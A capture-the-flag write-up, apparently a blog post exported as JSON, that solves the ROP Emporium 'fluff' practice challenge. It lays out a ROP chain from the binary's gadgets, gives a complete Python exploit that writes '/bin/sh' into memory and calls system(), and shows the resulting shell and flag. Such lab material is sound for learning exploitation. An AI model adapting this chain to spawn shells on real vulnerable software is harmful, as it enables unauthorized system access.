\nhttps:\/\/ropemporium.com\/challenge\/fluff.html<\/a><\/p>\n
Like the description says, not much here is different from the write4 challenge aside from the more abstract gadgets. It should be easy enough to find the gadgets to use:<\/p>\n
![\"\"](\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2019\/12\/fluff_questionableGadgets.png\")
<\/p>\n
This provides us with 4 gadgets. After examining the gadgets here, I open a text editor & start working out my plan of attack. I’ll illustrate the ROP chain I plan to use:<\/p>\n
\r\n1. 0x400832: pop r12; mov r13d, 0x604060; ret;\r\n Get a value into R12 (this will eventually go into R10)\r\n address1: Where to save the string to\r\n2. 0x400822: xor r11, r11; pop r14; mov edi, 0x601050; ret;\r\n Zero out the R11 register\r\n junkdata: Junk data for the "pop r14" instruction\r\n3. 0x40082f: xor r11, r12; pop r12; mov r13d, 0x604060; ret;\r\n Get a value into R11 (Since R11 is null, whatever is saved in R12 will be put into R11)\r\n string: The string we want to save will be popped into R12\r\n4. 0x400840: xchg r11, r10; pop r15; mov r11d, 0x602050; ret;\r\n Get the value from R11 into the R10 register\r\n junkdata: Junk data for the "pop r15" instruction\r\n5. Repeat steps 2-3 to get the string into r11\r\n6. 0x40084e: mov qword ptr [r10], r11; pop r13; pop r12; xor byte ptr [r10], r12b; ret;\r\n Write the value in R11 to the address in R10\r\n junkdata: Junk data for the "pop r13" instruction\r\n nulldata: Null bytes for the "pop r12" instruction. The next instruction will XOR this with [r10]\r\n7. 0x4005e0: call system()\r\n<\/pre>\nOne thing to note is that the address of the
.data<\/code> section (where the string will be saved to) is moved into the EDI register at step 2. This means that there’s no need for a\"pop rdi; ret\"<\/code> instruction. Now it’s a simple process to create the Python script:<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\n\r\npayload = b"A" * 40\r\npayload += (0x400832).to_bytes(8, "little") # pop r12; mov r13d, 0x604060; ret;\r\npayload += (0x601050).to_bytes(8, "little") # Where to save the string to (.data)\r\npayload += (0x400822).to_bytes(8, "little") # xor r11, r11; pop r14; mov edi, 0x601050; ret;\r\n # NOTE: This gadget puts .data address into EDI for us\r\npayload += b"AAAAAAAA" # Junk data for the "pop r14" instruction\r\npayload += (0x40082f).to_bytes(8, "little") # xor r11, r12; pop r12; mov r13d, 0x604060; ret;\r\npayload += b"\/bin\/sh\\x00" # The string to be popped into R12\r\npayload += (0x400840).to_bytes(8, "little") # xchg r11, r10; pop r15; mov r11d, 0x602050; ret;\r\npayload += b"AAAAAAAA" # Junk data for the "pop r15" instruction\r\npayload += (0x400822).to_bytes(8, "little") # xor r11, r11; pop r14; mov edi, 0x601050; ret;\r\npayload += b"AAAAAAAA" # Junk data for the "pop r14" instruction\r\npayload += (0x40082f).to_bytes(8, "little") # xor r11, r12; pop r12; mov r13d, 0x604060; ret;\r\npayload += b"AAAAAAAA" # Junk data for the "pop r12" instruction\r\npayload += (0x40084e).to_bytes(8, "little") # mov qword ptr [r10], r11; pop r13; pop r12; xor byte ptr [r10], r12b; ret;\r\npayload += b"AAAAAAAA" # Junk data for the "pop r13" instruction\r\npayload += b"\\x00" * 8 # Null bytes for the "pop r12" instruction\r\n # NOTE: The next instruction will XOR this with [r10]\r\npayload += (0x4005e0).to_bytes(8, "little") # call system()\r\n\r\nsys.stdout.buffer.write(payload)\r\n<\/pre>\n\r\nandrew ~\/fluff $ (.\/exploit.py; echo; cat) | .\/fluff \r\nfluff by ROP Emporium\r\n64bits\r\n\r\nYou know changing these strings means I have to rewrite my solutions...\r\n> id\r\nuid=1000(andrew) gid=1000(andrew) groups=1000(andrew),1001(sudo)\r\ncat flag.txt\r\nROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"The concept here is identical to the write4 challenge. The only difference is we may struggle to find gadgets that will get the job done. If we take the time to consider a different approach we’ll succeed … Continue readingROP Emporium | fluff Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1072","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=1072"}],"version-history":[{"count":16,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1072\/revisions"}],"predecessor-version":[{"id":1094,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1072\/revisions\/1094"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=1072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=1072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=1072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}